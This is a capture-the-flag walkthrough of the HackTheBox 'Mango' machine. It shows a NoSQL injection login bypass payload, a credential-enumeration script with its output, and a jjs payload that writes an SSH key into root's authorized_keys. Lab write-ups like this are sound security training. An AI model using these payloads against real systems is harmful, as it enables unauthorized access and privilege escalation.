HackTheBox “Mango” Walkthrough
Mango, a medium-level Linux OS machine on HackTheBox, centers around the exploitation of a NoSQL document database to circumvent an authorization page and subsequently expose database-related details. Upon obtaining user credentials from the database using a username/password enumeration script, the leverage of password reuse came into play, facilitating SSH access as one of the users and further elevating privileges through ‘su’ command usage. This progression led to the utilization of a SUID binary linked with Java, known as ‘jjs’. The attainment of a root shell was accomplished by the insertion of a public SSH key into the authorized keys file of the root user.
Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to full scan for open ports and services:
Since we didnt get anything from visiting the target at ports 80/443, and as noticed from the resutls of the nmap scan above, we needed to edit our /etc/hosts file to include 10.10.10.162 mango.htb staging-order.mango.htb.
Let’s take a look at staging-order.mango.htb.
Run Burp Suite app and employ the credentials “test:test.” Proceed to capture the corresponding request.
After experimenting with various default credentials and basic SQL injections, I proceeded to explore some NoSQL injections. I found a comprehensive collection of test injections in PayloadsAllTheThings. To initiate my exploration, I tried the payload below in the login parameters of the Burp’s request.
username[$ne]=toto&password[$ne]=toto
Upon clicking the forward button, the website redirects us to the /home.php page.
We identified a vulnerability within the site that its is susceptible to NoSQL Injection, which enabled us to pass the authentication system. As a result of this, we will use this python script that can be employed to enumerate the database for potential credentials.
Starting with potential usernames enumeration:
└─$ python2 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username
Warning: No method given. Using POST as the method. (You can give the method with -m)
<...omitted...>
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
<...omitted...>
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mangoPotential passwords enumeration:
└─$ python2 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep password
Warning: No method given. Using POST as the method. (You can give the method with -m)
<...omitted...>
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
<...omitted...>
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2Exploitation:
Collecting the findings in separate txt files.
Now, we use Hydra to brute force target’s SSH service.
We ssh into the target using mongo:h3mXK8RhU~f{]f5H .
Privilege Escalation:
We will list the setuid permission of the target’s files using the command below:
find / -perm -4000 -exec ls -l {} + 2>/dev/null
After going through the findings, we can see that jjs has a GTFOBins entry. But we will need to switch to admin username using the admin’s password t9KcS3>!0B#2 to be able to exploit jjs as it has an admin gid.
To exploit jjs, we will use file write option starting with creating the payload to wirte a generated id_rsa public key into the SSH autorized_keys of the target machine.
export EXPLOIT='var FileWriter = Java.type("java.io.FileWriter");var fw=new FileWriter("/root/.ssh/authorized_keys");fw.write("your id_rsa.pub");fw.close();'Here, we will use the id_rsa public key of our attack box. Let’s make sure generate the public/private keys for our attack box to make sure that they are there.
Prepare the payload.
echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCPE4hkk0VejNY/nN+EbCrHCbRvRIs8etPCvN7oTh6qStYjTF5FR3t4mmDDlBKtirA67UWG5m/Ism2UD3SYm46E0HoSJfzI9AfKav4v18aXXfjSgCZzO48ssgeZm00zqJDkedu9XpH+xmzz3GxSEINPIIoXpBDNo2NI3L2SJJ/Q5sxAE2lP9tjAvDBPgUv/Jh7jUYd6OwkZQdy4J+ceCVZ5r4ew/cVnLcJLTWlkxJA8T8EGC3K4oX8k67eNXrdJEoXH2h1B/4qaSJ/kOCHUNI2GGH+ZswC+rkY93XizV5GLhBnTosgBEWMopkIiyR0PujYf5XQFIHcxyf9eVZI4n+yt91VXrbLmAG1DuIPqAocZIHzFxL4cg+aji9bGIgirAhTUtmsGSLVItPlzQJpS0+8uzSQNtypKE1ybAd3xLAdlawEimmn2mv/qYYW76F3gaeVnBid7Sj3Mo9pYL4SW71pgqV3Vv/ILG2hEp/riUycLDtaeD4kHcBhpJwmrR2ITmok= kali@kali");
fw.close();' | jjsPut the payload in a bash file inside /tmp folder of the target machine and run.
We can now ssh into the target with root profile using our private key since our public key has been written into the target.
Cheers.
